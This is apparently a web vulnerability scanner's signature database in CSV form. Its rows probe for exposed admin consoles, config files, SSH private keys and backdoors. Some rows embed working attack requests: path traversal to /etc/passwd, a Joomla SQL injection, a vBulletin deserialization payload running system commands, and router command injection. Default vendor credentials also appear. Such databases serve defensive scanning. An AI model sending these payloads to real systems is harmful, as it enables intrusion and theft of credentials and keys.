"007046","","5","@MAGMIweb/download_file.php?file=../../../../../../../../../../../etc/passwd","GET","root:","","","","","MAGMI allows any file to be retrieved remotely.","","" "007047","","5","@MAGMIweb/download_file.php?file=../../app/etc/local.xml","GET","<username>.*<\/username>","","<password>.*<\/password>","","","MAGMI allows any file to be retrieved remotely.","","" "007048","","be","@MAGMIweb/magmi.php","GET","<link rel=\"stylesheet\" href=\"css\/magmi\.css\"><\/link>","","","","","MAGMI Administration interface found.","","" "007049","","123b","@MAGMIReleaseNotes.txt","GET","RELEASE NOTES FOR MAGMI","","","","","MAGMI Release Notes identified.","","" "007050","","be","@HYBRIS","GET","[H|h]ybris","","[M|m]anagement\s[C|c]onsole","","","SAP Hybris Management Console found. Default credentials are admin:nimda","","" "007051","","be","@HYBRISlogin.jsp","GET","[H|h]ybris","","[A|a]dministration\s[C|c]onsole","","","SAP Hybris Administration Console found. Default credentials are admin:nimda","","" "007052","","23","/cfg/CFGConnectionParams.txt","GET","user=","","","","","Caremark Carestream config file found. May include account information and host data.","","" "007053","","23","/serverVars.js","GET","SERVER_IPADDRESS","","","","","Caremark Carestream JavaScript config file found. May include host information..","","" "007054","","9","/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=75&type_id=1&list[select]=(select%201%20FROM(select%20count(*),concat((select%20(select%20concat(session_id))%20FROM%20jml_session%20LIMIT%200,1),floor(rand(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a)","GET","Duplicate\sEntry","Subquery","","","","Joomla is vulnerable to a SQL injection which can lead to administrator access. https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/?page=1&year=0&month=0","","" "007055","","3b","/azenv.php","GET","HTTP_CONNECTION","","","","","This program is a proxy test script which echoes environment variables.","","" "007056","","be","@PIWIKindex.php","GET","<title>.*[Pp]iwik.*</title>","http://piwik\.org","200","","","Piwik Analytics login found.","","" "007057","","123b","@PIWIKCHANGELOG.md","GET","## Piwik ([0-9.]+)","","200","","","Piwik Analytics Changelog identified.","","" "007058","CVE-2015-7808","8","@VBULLETINajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A25%3A%22system%28%27cat%20%2Fetc%2Fpasswd%27%29%22%3B%7D","GET","root:0","","","","","vBulletin 5 contains a remote command execution.","","" "007059","","3","/GulpFile.js","GET","var\sgulp","","","","","GulpFile.js build config may reveal sensitive information.","","" "007060","","3","/admin/views/ajax/autocomplete/user/a","GET","\"admin\":","","","","","Drupal Views module discloses user names, including the administrator. http://www.madirish.net/node/465.","","" "007062","","e","/page.cmd","POST","(IP configuration|Subnet mask|Default route|Primary DNS)","","","","","Unify/Siemens OpenStage SIP has a default password 123456 set.","page_submit=WEBMp_Admin_Login&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456","" "007063","","e","/page.cmd","POST","(IP configuration|Subnet mask|Default route|Primary DNS)","","","","","Unify/Siemens OpenStage SIP has a default password 123456 set.","page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&WEBMv-Admin-Password=123456","" "007064","","e","/page.cmd","POST","(IP configuration|Subnet mask|Default route|Primary DNS)","","","","","Unify/Siemens OpenStage SIP has a default password 123456 set.","page_submit=WEBMp_AdminLogin&page-next=WEBM_Admin_IpConfiguration&AdminPassword=123456","" "007065","","e","/authorize","POST","Access Granted\. This IP Address now has admin","access to the restricted printer pages\.","","","","Zebra PrintServer Webinterface has a default password 1234 set.","0=1234","" "007066","","eb","/sitecore/login","GET","Sitecore\.NET","","","","","Sitecore CMS login found.","","" "007067","","eb","/sitecore/admin/login.aspx?returnUrl=/","GET","into\sSitecore","","","","","Sitecore CMS admin login found.","","" "007070","","be","/struts/webconsole.html","GET","wc-command","","","","","Struts debugging is enabled and OGNL console is available.","","" "007071","","3b","/owa/auth/logon.aspx","GET","<title>Outlook Web App<\/title>","(/owa/([0-9.]+)/themes/|/owa/auth/([0-9.]+)/themes/)","","","","Outlook Web App identified. OWA is exposing its version within the themes path like /owa/auth/15.0.995/themes.","","" "007072","","be","/system/console/configMgr","GET","AEM Sign","","","","","Adobe Experience Manager OSGi console.","","" "007074","","be","/system/sling/cqform/defaultlogin.html","GET","QUICKSTART_HOMEPAGE","","","","","Adobe Experience Manager Sling console.","","" "007075","","be","/crx/de/index.jsp","GET","crxde_favicon\.ico","","","","","Adobe Experience Manager CRXDE console.","","" "007076","","be","/libs/cq/core/content/login.html","GET","CQ5 - Sign In","","","","","Adobe Experience Manager CQ5 admin login.","","" "007077","https://exploit-db.com/exploits/39184/","5","/scgi-bin/platform.cgi","POST","root:","loic_ipsec:","","","","Devices with Cisco http firewall are prone to a local file inclusion.","button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00","" "007078","","3","@PAGESPEED","GET","<b>Pagespeed\sAdmin<\/b>","","","","","This reveals information about the running Pagespeed Module (mod_pagespeed/ngx_pagespeed). Comment out appropriate line in the webservers conf file or restrict access to allowed sources.","","" "007079","https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/","4","@MAGENTOskin/adminhtml/default/default/media/editor.swf","GET","@MD5259afd515d7b2edee76f67973fea95a6","","","","","Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS).","","" "007080","https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/","4","@MAGENTOskin/adminhtml/default/default/media/uploader.swf","GET","@MD51c300001dadd932ef6e33a2fadf941e1","","","","","Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS).","","" "007081","https://appcheck-ng.com/unpatched-vulnerabilites-in-magento-e-commerce-platform/","4","@MAGENTOskin/adminhtml/default/default/media/uploaderSingle.swf","GET","@MD5304dd960698c5786dcd64b0e138f80ca","","","","","Several Adobe Flash files that ship with Magento are vulnerable to DOM based Cross Site Scripting (XSS).","","" "007082","","23","/.MySCMServerInfo","GET","SCMBranch","","","","","Surround SCM file reveals a list of files in source control.","","" "007083","","23","/_diagnostic.jsp","GET","WebDX\sSC","","","","","GE Centricity PACS WebDX diagnostics page reveals detailed application and system information.","","" "007084","https://www.pentestpartners.com/blog/pwning-cctv-cameras/","8","/shell?cat%20/etc/passwd","GET","root:.*:0:[01]:","","","","","Multiple DVR devices are prone to a remote command execution.","","" "007085","https://www.pentestpartners.com/blog/pwning-cctv-cameras/","ae","/view2.html","GET","<span\slxc_lang=\"view_Channel\">Channel<\/span>","<a\sid=\"connectAll\"\slxc_lang=\"view_Connect_all\">","200","","","Multiple DVR devices are prone to an authentication bypass.","","Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null" "007086","https://www.pentestpartners.com/blog/pwning-cctv-cameras/","ae","/main.html","GET","<span\slxc_lang=\"view_Channel\">Channel<\/span>","<a\sid=\"connectAll\"\slxc_lang=\"view_Connect_all\">","200","","","Multiple DVR devices are prone to an authentication bypass.","","Cookie: dvr_camcnt=24; dvr_usr=null; dvr_pwd=null" "007087","","b","@SYMPHONYREADME.markdown","GET","http:\/\/getsymphony\.com","","200","","","Symphony CMS README file found containing the version of the CMS.","","" "007088","","b","@SYMPHONYREADME","GET","Symphony\s([0-9.]+)","","200","","","Symphony CMS README file found containing the version of the CMS.","","" "007089","","3b","@AXIS2services/Version?method=getVersion","GET","Apache\sAxis\sversion","The\sAXIS\sengine\scould\snot\sfind\sa\starget\sservice\sto\sinvoke!","","","","Apache Axis identified. This URL might also expose the running version of Axis.","","" "007090","","3b","@CKEDITORckeditor.js","GET","CKSource","","CKEDITOR","","","CKEditor identified. This file might also expose the version of CKEditor.","","" "007091","","3b","@CKEDITORCHANGES.md","GET","CKEditor","","Changelog","","","CKEditor Changelog identified.","","" "007092","","4","@CKEDITORsamples/sample_posteddata.php","POST","<script>alert\('XSS'\)</script>","","ckeditor.com","","","CKEditor 4.0.1 and below is vulnerable to a Cross-Site Scripting (XSS) vulnerability.","<script>alert('XSS')</script>[]=PATH DISCLOSURE","" "007093","","3","/app/plugins/php_plugin/phpinfo.php","GET","PHP Version","","","","","Android PAW Server PHP plugin phpinfo.php script reveals system information.","","" "007094","https://getcomposer.org/","23","/composer.json","GET","\"(require|name)\":\s","","","","","PHP Composer configuration file reveals configuration information.","","" "007095","https://getcomposer.org/","23","/composer.lock","GET","(getcomposer\.org|\"require\":\s)","","","","","PHP Composer configuration file reveals configuration information.","","" "007096","","2","/install.sql","GET","(CREATE TABLE|create table|INSERT INTO|insert into)","","","","","Installation SQL file found.","","" "007097","","2","/setup.sql","GET","(CREATE TABLE|create table|INSERT INTO|insert into)","","","","","Setup SQL file found.","","" "007098","RFC-5785","1","/.well-known/browserid","GET","public-key","provisioning","","","","Mozilla Persona may leak additional URLs on the server.","","" "007099","RFC-5785","1","/.well-known/acme-challenge","GET","Index of \/","","","","","Letsencrypt.org key information may be available in this directory.","","" "007100","RFC-5785 http://www.bacnet.org/Addenda/Add-135-2012am-ppr3-draft-17_chair_approved.pdf","1","/.well-known/ashrae","GET","bacnet\.org","","","","","ASHRAE file may contain server info.","","" "007101","RFC-5785 https://github.com/google/digitalassetlinks/blob/master/well-known/details.md","1","/.well-known/assetlinks.json","GET","namespace\"","","","","","Google Asset Links Specification file may contain server info.","","" "007102","RFC-5785 http://tools.ietf.org/html/rfc6764","1","/.well-known/caldav","GET","current-user-principal","","","","","CalDAV file may contain server info.","","" "007103","RFC-5785 http://tools.ietf.org/html/rfc6764","1","/.well-known/carddav","GET","principal","","","","","CardDAV file may contain server info.","","" "007104","https://typo3.org/","23","@TYPO3ChangeLog","GET","Release\sof\sTYPO3","","","","","TYPO3 ChangeLog file found.","","" "007105","RFC-5785 RFC-6690 http://tools.ietf.org/html/rfc6690","1","/.well-known/core","GET",">rt=",">if=","","","","core file may contain server info/links.","","" "007106","RFC-5785 https://www.w3.org/TR/2015/CR-tabular-data-model-20150716/","1","/.well-known/csvm","GET","csv-metadata\.json","csvm\.json","","","","csvm file may contain server links.","","" "007107","https://typo3.org/","b","@PHPMYADMINREADME","GET","phpMyAdmin\s-\sReadme","","200","","","phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.","","" "007108","","23","/v1/credentials","GET","secretValue:\s\"","","","","","Rancher Docker manager appears to be available without authentication. It has built in remote shell functionality. Have fun.","","" "007109","","1","/web.txt","GET","200","","","","","This might be interesting.","","" "007110","","d","@AXIS2services/AdminService?wsdl","GET","AdminServiceResponse","AdminServiceRequest","","","","Apache Axis AdminService identified.","","" "007111","","e","@AXIS2servlet/AdminServlet","GET","<title>Axis<\/title>","Server\sis\srunning","","","","Apache Axis AdminServlet identified.","","" "007112","","23","@AXIS2SOAPMonitor","GET","SOAPMonitorApplet\.class","","","","","Apache Axis SOAPMonitor identified.","","" "007113","","d","@AXIS2EchoHeaders.jws?method=list","GET","<soapenv:Envelope","","","","","Apache Axis EchoHeaders default webservice.","","" "007114","","b","@AXIS2index.jsp","GET","Apache-AXIS<\/h1>","<title>Apache-Axis<\/title>","","","","Apache Axis Web Application identified.","","" "007115","http://ws.apache.org/axis/java/security.html","23","@AXIS2servlet/AxisServlet","GET","And now\.\.\.\sSome\sServices","","","","","Apache Axis web services reveals information about all installed web services.","","" "007116","","be","/workarea/login.aspx","GET","ektron\.javascript","","","","","Ektron CMS administrative interface found.","","" "007119","","3","/core/modules/config/config.info.yml","GET","version:","","","","","Drupal version number revealed in config.info.yml","","" "007120","","3","/core/CHANGELOG.txt","GET","Drupal\s","","","","","Drupal version number revealed in CHANGELOG.txt","","" "007121","","3","/.ssh/id_rsa","GET","^-----((BEGIN|END)\sRSA\sPRIVATE\sKEY|(BEGIN|END)\sENCRYPTED\sPRIVATE\sKEY|(BEGIN|END)\sOPENSSH\sPRIVATE\sKEY)-----","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007122","","3","/.ssh/id_rsa.pub","GET","^(ssh-rsa)","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007123","","3","/.ssh/id_dsa","GET","^-----((BEGIN|END)\sDSA\sPRIVATE\sKEY|(BEGIN|END)\sENCRYPTED\sPRIVATE\sKEY|(BEGIN|END)\sOPENSSH\sPRIVATE\sKEY)-----","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007124","","3","/.ssh/id_dsa.pub","GET","^(ssh-dsa)","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007125","","3","/.ssh/id_dss","GET","^-----((BEGIN|END)\sDSS\sPRIVATE\sKEY|(BEGIN|END)\sENCRYPTED\sPRIVATE\sKEY|(BEGIN|END)\sOPENSSH\sPRIVATE\sKEY)-----","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007126","","3","/.ssh/id_dss.pub","GET","^(ssh-dss)","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007127","","e","/phpLiteAdmin/","GET","phpliteadmin\.php","","","","","phpLiteAdmin console found.","","" "007128","","e","/MAMP/phpLiteAdmin/","GET","phpliteadmin\.php","","","","","phpLiteAdmin console found.","","" "007129","","1","/.sqlite_history","GET","^(tables|quit|databases|INSERT|insert|delete|DELETE|drop|DROP|grant|GRANT|select|SELECT)","","200","","","This might be interesting.","","" "007130","CVE-2016-6195 https://enumerated.wordpress.com/2016/07/11/1/","9","@FORUMforumrunner/request.php?cmd=get_spam_data&d=1&postids='1","GET","(database\shas\sencountered\sa\sproblem|/image\.php\?type=dberror)","","","","","vBulletin contains a SQL injection in the forumrunner addon.","","" "007131","CVE-2016-6195 https://enumerated.wordpress.com/2016/07/11/1/","9","@VBULLETINforumrunner/request.php?cmd=get_spam_data&d=1&postids='1","GET","(database\shas\sencountered\sa\sproblem|/image\.php\?type=dberror)","","","","","vBulletin contains a SQL injection in the forumrunner addon.","","" "007132","","b","/sitecore/shell/webservice/service.asmx","GET","Visual Sitecore Service","","","","","The SiteCore CMS shell webservice is running which could allow an attacker to brute force account information or execute API commands","","" "007133","","b","/sitecore/admin/login.aspx","GET","Log into Sitecore","","","","","The SiteCore CMS administrative login interface is available which could allow brute force or unauthorized access","","" "007134","","b","/sitecore/debug","GET","Default page","","","","","The SiteCore CMS debug interface was identified as accessible","","" "007137","","3","/.ssh/id_ecdsa.pub","GET","^(ecdsa-sha2-nistp256)","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007138","","3","/.ssh/id_ecdsa","GET","^-----((BEGIN|END)\sEC\sPRIVATE\sKEY|(BEGIN|END)\sENCRYPTED\sPRIVATE\sKEY|(BEGIN|END)\sOPENSSH\sPRIVATE\sKEY)-----","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007139","","3","/.ssh/id_ed25519.pub","GET","^(ssh-ed25519)","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007140","","3","/.ssh/id_ed25519","GET","^-----((BEGIN|END)\sENCRYPTED\sPRIVATE\sKEY|(BEGIN|END)\sOPENSSH\sPRIVATE\sKEY)-----","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007141","","3","/.ssh/identity","GET","^SSH PRIVATE KEY FILE FORMAT","","200","","","A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.","","" "007142","","2","/user_guide/","GET","CodeIgniter User Guide","","","","","CodeIgniter User Guide exposes installed version number.","","" "007143","","3","/.idea/misc.xml","GET","ProjectRootManager","","","","","JetBrains project IDE reveals application information.","","" "007144","","3","/.idea/modules.xml","GET","module\sfileurl","","","","","JetBrains project IDE reveals application information.","","" "007145","","3","/.idea/vcs.xml","GET","mapping\sdirectory","","","","","JetBrains project IDE reveals application information.","","" "007146","","3","/.idea/workspace.xml","GET","project\sversion","","","","","JetBrains project IDE reveals application information.","","" "007147","","3","/.idea/scopes/scope_settings.xml","GET","DependencyValidationManager","","","","","JetBrains project IDE reveals application information.","","" "007148","CVE-2013-3831 https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html","9","/portal/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27","GET","Failed\sto\sparse\squery","","","","","Oracle Portal Demo Org Chart is vulnerable to SQL injection.","","" "007149","CVE-2013-3831 https://packetstormsecurity.com/files/123650/Oracle-Portal-Demo-Organization-Chart-PL-SQL-Injection.html","9","/pls/portal/PORTAL_DEMO.ORG_CHART.SHOW?p_arg_names=_max_levels&p_arg_values=1&p_arg_names=_start_with_field&p_arg_values=null&p_arg_names=_start_with_value&p_arg_values=:p_start_with_value%27","GET","Failed\sto\sparse\squery","","","","","Oracle Portal Demo Org Chart is vulnerable to SQL injection.","","" "007150","","bde","/api/jsonws/","GET","json-web-services-api","","","","","LifeRay WebServices API found.","","" "007151","","bde","/api/jsonws/index.jsp","GET","json-web-services-api","","","","","LifeRay WebServices API found.","","" "007152","","5","//WEB-INF/web.xml","GET","j2ee","","","","","A web.xml file was retrieved from the WEB-INF directory by prepending an additional slash.","","" "007153","","e","/webconsole/vsplogin.action","GET","Avaya","","Web Console","","","Avaya web console found. Default credential is admin:admin01","","" "007154","","e","/cgi-bin/common/login/webLogin","GET","Avaya","","System Management Interface","","","Avaya management interface found. Default credential is admin:admin01","","" "007155","","e","/php/login.php","GET","Creating administrative session","","bug fix 2157","","","Palo Alto Networks firewall web admin page found","","" "007156","","e","/ui/","GET","Infoblox System Manager","","Infoblox WebUI Login Page ID","","","Infoblox web console found. Default credential is admin:infoblox","","" "007157","","e","/WebLM/","GET","Web License Manager \(WebLM\)","","Avaya","","","Avaya license managing console found. Default credential is admin:weblmadmin","","" "007158","","e","/g450.html","GET","Avaya G450\/G350 - Avaya Device Management","","routerIp","","","Avaya web console found. Default SNMP community string is public","","" "007159","","e","/local-login/","GET","Unified Communications Management","","Avaya","","","Avaya System Manager web console found. Default credential is admin:admin","","" "007160","","3","@WORDPRESSwp-content/plugins/simply-static/debug.txt","GET","class-ss-archive","","","","","Wordpress Simply Static debug log may reveal site information","","" "007161","","0","/Editor/assetmanager/assetmanager.asp","GET","Upload\sFile","","","","","InnovaStudio file uploader found","","" "007162","CVE-2017-9248","0","/Telerik.Web.UI.DialogHandler.aspx","GET","200","","Loading the dialog","","","Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads","","" "007163","CVE-2017-9248","0","/Telerik.Web.UI.DialogHandler.aspx?dp=////","GET","200","","Base-64","cannot be less than zero","","Telerik UI for ASP.NET AJAX: poor crypto may lead to arbitrary file uploads","","" "007164","CVE-2017-9248","0","/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx","GET","200","","Loading the dialog","","","Telerik UI for ASP.NET AJAX Dialog Handler: application may allow file uploads","","" "007165","CVE-2017-9248","0","/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=////","GET","200","","Base-64","cannot be less than zero","","Telerik UI for ASP.NET AJAX: poor crypto may lead to arbitrary file uploads","","" "007166","","be","/_adminer.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007167","","be","/livehelp/admin/index.php","GET","<title>Live\sHelp\sWeb\sApp","","","","","Chatstack live chat software admin interface found.","","" "007168","","123","/.config.local.php.swp","GET","db_host","","db_user","","","CS Cart config.local.php swap file found.","","" "007169","","be","/ad.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007170","","be","/adminer-4.2.5-en.phpp","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007171","","be","/addminer-4.2.5-mysqlphp","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007172","","be","/adminer-4.2.5.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007173","","be","/adminer-4.3.0-en.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007174","","be","/adminer-4.3.0-mysql-en.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007175","","be","/adminer-4.3.0-mysql.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007176","","be","/adminer-4.3.0.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007177","","be","/adminer-4.3.1.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007178","","be","/adminer-4.3.1-en.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007179","","be","/adminer-4.3.1-mysql-en.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007180","","be","/adminer-4.3.1-mysql.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007181","","be","/Adminer.php","GET","<title>Select\sdatabase\s-","","www\.adminer\.org","","","The Adminer program is a database admin access tool which can allow full administrative access to databases.","","" "007182","CVE-2017-10271","8a","/wls-wsat/CoordinatorPortType","GET","weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortTypePortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007183","CVE-2017-10271","8a","/wls-wsat/RegistrationPortTypeRPC","GET","weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationPortTypeRPCPortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007184","CVE-2017-10271","8a","/wls-wsat/ParticipantPortType","GET","weblogic.wsee.wstx.wsat.v10.endpoint.ParticipantPortTypePortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007185","CVE-2017-10271","8a","/wls-wsat/RegistrationRequesterPortType","GET","weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationRequesterPortTypePortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007186","CVE-2017-10271","8a","/wls-wsat/CoordinatorPortType11","GET","weblogic.wsee.wstx.wsat.v10.endpoint.CoordinatorPortType11PortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007187","CVE-2017-10271","8a","/wls-wsat/RegistrationPortTypeRPC11","GET","weblogic.wsee.wstx.wsat.v10.endpoint.RegistrationPortTypeRPC11PortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007188","CVE-2017-10271","8a","/wls-wsat/ParticipantPortType11","GET","weblogic.wsee.wstx.wsat.v10.endpoint.ParticipantPortType11PortImpl","","200","","","Oracle WebLogic Server may be vulnerable to remote takeover.","","" "007189","","1b","@CGIDIRSfilemanager/Manager.pl","GET","iDC File Manager is a powerful multilingual web based system","","","","","iDC File Manager found","","" "007190","","3b","/common/about","GET","KACE\sSystems","","","","","Dell KACE Systems Management Appliance version information","","" "007191","","3","/master.xml","GET","200","","","","","This might be interesting.","","" "007192","","3","/masters.xml","GET","200","","","","","This might be interesting.","","" "007193","","3","/connections.xml","GET","200","","","","","This might be interesting.","","" "007194","","3","/connection.xml","GET","200","","","","","This might be interesting.","","" "007195","","3","/passwords.xml","GET","200","","","","","This might be interesting.","","" "007196","","3","/PasswordsData.xml","GET","200","","","","","This might be interesting.","","" "007197","","3","/users.xml","GET","200","","","","","This might be interesting.","","" "007198","","3","/conndb.xml","GET","200","","","","","This might be interesting.","","" "007199","","3","/conn.xml","GET","200","","","","","This might be interesting.","","" "007200","","3","/security.xml","GET","200","","","","","This might be interesting.","","" "007201","","3","/accounts.xml","GET","200","","","","","This might be interesting.","","" "007202","","3","/db.json","GET","200","","","","","This might be interesting.","","" "007203","","3","/userdata.json","GET","200","","","","","This might be interesting.","","" "007204","","3","/login.json","GET","200","","","","","This might be interesting.","","" "007205","","3","/master.json","GET","200","","","","","This might be interesting.","","" "007206","","3","/masters.json","GET","200","","","","","This might be interesting.","","" "007207","","3","/connections.json","GET","200","","","","","This might be interesting.","","" "007208","","3","/connection.json","GET","200","","","","","This might be interesting.","","" "007209","","3","/passwords.json","GET","200","","","","","This might be interesting.","","" "007210","","3","/PasswordsData.json","GET","200","","","","","This might be interesting.","","" "007211","","3","/users.json","GET","200","","","","","This might be interesting.","","" "007212","","3","/conndb.json","GET","200","","","","","This might be interesting.","","" "007213","","3","/conn.json","GET","200","","","","","This might be interesting.","","" "007214","","3","/security.json","GET","\"(authentication|encryption)\"(\s+)?\:","","","","","JSON config file found..","","" "007215","","3","/accounts.json","GET","200","","","","","This might be interesting.","","" "007216","","3","/package.json","GET","\"name\"\:","","\"dependencies\"\:","","","Node.js package file found. It may contain sensitive information.","","" "007217","","3","/redis_config.json","GET","host\"(\s+)?\:","","","","","Redis config file found. It may contain sensitive information.","","" "007218","","3","/credis/tests/redis_config.json","GET","host\"(\s+)?\:","","","","","Redis config file found. It may contain sensitive information.","","" "007219","","3","/redis/config.json","GET","mount\"(\s+)?\:","","","","","Redis config file found. It may contain sensitive information.","","" "007220","","3","/config/redis.json","GET","host\"(\s+)?\:","","","","","Redis config file found. It may contain sensitive information.","","" "007221","","3","/firebase.json","GET","hosting\"(\s+)?\:","","","","","Firebase config file found. It may contain sensitive information.","","" "007222","","d","/ws.asmx","GET","Web\sService","","","","","Webservice found","","" "007223","","d","/ws/ws.asmx","GET","Web\sService","","","","","Webservice found","","" "007224","","23","/.gitignore","GET","200","","","","",".gitignore file found. It is possible to grasp the directory structure.","","" "007225","","23","/.hgignore","GET","200","","","","",".hgignore file found. It is possible to grasp the directory structure.","","" "007226","","23","/.env","GET","200","","","","",".env file found. The .env file may contain credentials.","","" "007227","","7","@WORDPRESSwp-content/themes/twentyeleven/images/headers/server.php?filesrc=/etc/hosts","GET","Current Path","127\.0\.0\.1","","","","A PHP backdoor file manager was found.","","" "007228","","7","@WORDPRESSwp-includes/Requests/Utility/content-post.php?filesrc=/etc/hosts","GET","Current Path","127\.0\.0\.1","","","","A PHP backdoor file manager was found.","","" "007229","","7","@WORDPRESSwp-includes/js/tinymce/themes/modern/Meuhy.php?filesrc=/etc/hosts","GET","Current Path","127\.0\.0\.1","","","","A PHP backdoor file manager was found.","","" "007230","","7","@WORDPRESSwp-license.php?file=/","GET","href=\"?file=/","","","","","A PHP backdoor file manager was likely found.","","" "007231","","7","/assets/mobirise/css/meta.php?filesrc=","GET","Current Path","127\.0\.0\.1","","","","A PHP backdoor file manager was found.","","" "007232","","7","/Meuhy.php","GET","404-server!!","","","","","A PHP backdoor file manager was likely found.","","" "007233","","3","/HNAP1/","GET","GetDeviceSettingResult","","","","","HNAP1 router information often displays sensitive information.","","" "007234","","8","/login.cgi?cli=aa%20aa%27cat%20/etc/hosts","GET","127\.0\.0\.1","","","","","Some D-Link router remote command execution.","","" "007235","","8","/shell?cat+/etc/hosts","GET","127\.0\.0\.1","","","","","A backdoor was identified.","","" "007236","","3","/currentsetting.htm","GET","Model=","","","","","Netgear information disclosure.","","" "007237","","3","/device_description.xml","GET","modelDescription","","","","","Sonos information disclosure.","","" "007238","","3","/evox/about","GET","serverName","","","","","Trane Tracer information disclosure.","","" "007239","RFC-5785","3","/.well-known/security.txt","GET","contact:","","","","","Potential .well-known information disclosure.","","" "007240","","7","/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=","GET","wave=","","","","","Argus Surveillance DVR 4.0.0.0 contains a local file retrieval vulnerability","","" "007241","","1","/util/xmlrpc/Handler.ashx","GET","EPiServer XMLRPC","","","","","EpiServer API discovered","","" "007242","RFC-5785","3","/.well-known/openid-configuration","GET","issuer","","","","","OpenID Provider Configuration Information.","","" "007243","RFC-5785","3","/.well-known/oauth-authorization-server","GET","issuer","","","","","OAuth 2.0 Authorization Server Metadata.","","" "007244","","e","/ibm/console/logon.jsp","GET","action=\"/ibm/console/j_security_check","","","","","IBM WebSphere admin console","","" "007245","CVE-2017-17762","f","/util/xmlrpc/Handler.ashx","GET","EPiServer.Blog 7.0(\.([0-4]|5([0-7]|8[1-5])))?","","","","","EpiServer Blog 7.0.586 and below may contain an XXE vulnerability in the blog module, which is accessible even if the module is not activated.","","" "007246","CVE-2019-1653","23","/cgi-bin/config.exp","GET","sysconfig","","","","","Cisco RV320/RV325 information disclosure","","" "007247","CVE-2019-2725 